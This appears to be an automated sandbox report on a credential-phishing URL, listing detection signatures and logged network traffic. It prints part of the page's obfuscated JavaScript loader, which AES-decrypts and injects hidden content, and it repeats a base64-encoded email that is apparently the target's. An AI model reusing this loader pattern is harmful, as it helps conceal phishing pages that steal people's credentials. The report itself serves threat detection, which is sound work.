Windows Analysis Report
https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t

Overview

General Information

Sample URL:	https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t
Analysis ID:	1541474
Infos:

Detection

HTMLPhisher

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected HtmlPhish70

Detected non-DNS traffic on DNS port

HTML page contains hidden javascript code

Stores files to the Windows start menu directory

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t

SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

Yara detected HtmlPhish70

Source: Yara match	File source: 2.4.pages.csv, type: HTML
Source: Yara match	File source: 1.10.pages.csv, type: HTML
Source: Yara match	File source: 1.8.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_205, type: DROPPED
Source: Yara match	File source: dropped/chromecache_171, type: DROPPED

HTML page contains hidden javascript code

Source: https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t

HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: async function daffiness(tableland) { var {a,b,c,d} = json.parse(tableland); returncryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}),{iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async functiongain(){ earphone.hidden = 0; napalm.hidden= 1; document.write(await daffiness(await(await fetch(await daffiness(atob(`eyjhijoicvurvxo4ohdwxc9ysllfm0fabtjlcdzknwuyd0hebfbaugxlzes2wg1yaza9iiwiyyi6ijq0odfmmjk1mjqwmmuzyzu4ntu4zjdlyzyzndgwnwfjiiwiyii6ijzlyze0mwy2zjy0ytu1mwq3yjjkmzmwmdaxmdrhnjk1zjlhzme1zgewndq5nmzjntk2zmzlntixzmnmmtywymqymzvmodnly2zlymqyzjkxogywmzeyodjmmtyzyjizztuxndu4mti5ytrlzmq3mty3ntbmmjrjyzazotbhytyzymq1ytixywe0mwvmyzblymy3mzyzm2fkn2m1n2zjntu3owrkmjy3yzmwzwuzmjixytazymzhmjbiodg5mtq2mjyxzji2ytvlotq4zta1mtnlotyyywrhowq2m2q2ymexyznjnwi3n2fmn2q3mjrhmwq3yjg1ztzlywu3nwrkztg5zwyyzjk3owu1nthiyjg1owywowe5n2u1y2rlmge2mwm4ztvkzmexzjgxzdbiyz...
Source: https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: async function daffiness(tableland) { var {a,b,c,d} = json.parse(tableland); returncryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}),{iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async functiongain(){ earphone.hidden = 0; napalm.hidden= 1; document.write(await daffiness(await(await fetch(await daffiness(atob(`eyjhijoicvurvxo4ohdwxc9ysllfm0fabtjlcdzknwuyd0hebfbaugxlzes2wg1yaza9iiwiyyi6ijq0odfmmjk1mjqwmmuzyzu4ntu4zjdlyzyzndgwnwfjiiwiyii6ijzlyze0mwy2zjy0ytu1mwq3yjjkmzmwmdaxmdrhnjk1zjlhzme1zgewndq5nmzjntk2zmzlntixzmnmmtywymqymzvmodnly2zlymqyzjkxogywmzeyodjmmtyzyjizztuxndu4mti5ytrlzmq3mty3ntbmmjrjyzazotbhytyzymq1ytixywe0mwvmyzblymy3mzyzm2fkn2m1n2zjntu3owrkmjy3yzmwzwuzmjixytazymzhmjbiodg5mtq2mjyxzji2ytvlotq4zta1mtnlotyyywrhowq2m2q2ymexyznjnwi3n2fmn2q3mjrhmwq3yjg1ztzlywu3nwrkztg5zwyyzjk3owu1nthiyjg1owywowe5n2u1y2rlmge2mwm4ztvkzmexzjgxzdbiyz...

Source: https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	HTTP Parser: No favicon
Source: https://pupsarebestde.ru//#contact	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:60695 version: TLS 1.2

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.16:60665 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108

Source: global traffic	HTTP traffic detected: GET /index.html HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /index.html HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8d7c74e579c6dd24 HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js?onload=tDpp4&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://onlinepdf-qrsharedfile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onlinepdf-qrsharedfile.com/index.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js?onload=tDpp4&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8d7c74e579c6dd24 HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iq5m1/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c750558594780&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iq5m1/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iq5m1/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1916946690:1729797150:TRiyx_MJd91XIRaek2QQT1kUoEY6p9Qno7I0j5ezJB8/8d7c74e579c6dd24/Ln0MKcwLkJ._mactG8XS7qHbwoMgxlbMVaN67RMxyUs-1729799015-1.2.1.1-XPRJnKgqBoBS18FVeWftwAkeInPsA24i539TseagB4uzKJFR.Y4lpb3o2yja7Y7w HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c750558594780&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onlinepdf-qrsharedfile.com/index.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/390116221:1729797281:TPbjhukFlGLZ4Na-Ed5xPywx4jBSVdihJElDWP8w7qE/8d7c750558594780/Ycuynu_MovGk8HEcrgS_SolB4i3XiM.t7kveizMDDSQ-1729799020-1.1.1.1-_sCIh9gL0iGL7u0iCtrK0m0bheJdgYR0C2kbvLmfqPqZgATTQhRzY79iesWO1QT_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d7c750558594780/1729799023150/bf4b2f55be509a179579ea17499ecec8026fc8792968ffabc07a1d921c7600dc/AQtoEVWkediKV3l HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iq5m1/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7c750558594780/1729799023153/FLgUDq43Jq_StjH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iq5m1/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uhegHGCPHORYRbC&MD=dbf1VdYs HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7c750558594780/1729799023153/FLgUDq43Jq_StjH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/390116221:1729797281:TPbjhukFlGLZ4Na-Ed5xPywx4jBSVdihJElDWP8w7qE/8d7c750558594780/Ycuynu_MovGk8HEcrgS_SolB4i3XiM.t7kveizMDDSQ-1729799020-1.1.1.1-_sCIh9gL0iGL7u0iCtrK0m0bheJdgYR0C2kbvLmfqPqZgATTQhRzY79iesWO1QT_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/390116221:1729797281:TPbjhukFlGLZ4Na-Ed5xPywx4jBSVdihJElDWP8w7qE/8d7c750558594780/Ycuynu_MovGk8HEcrgS_SolB4i3XiM.t7kveizMDDSQ-1729799020-1.1.1.1-_sCIh9gL0iGL7u0iCtrK0m0bheJdgYR0C2kbvLmfqPqZgATTQhRzY79iesWO1QT_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1916946690:1729797150:TRiyx_MJd91XIRaek2QQT1kUoEY6p9Qno7I0j5ezJB8/8d7c74e579c6dd24/Ln0MKcwLkJ._mactG8XS7qHbwoMgxlbMVaN67RMxyUs-1729799015-1.2.1.1-XPRJnKgqBoBS18FVeWftwAkeInPsA24i539TseagB4uzKJFR.Y4lpb3o2yja7Y7w HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
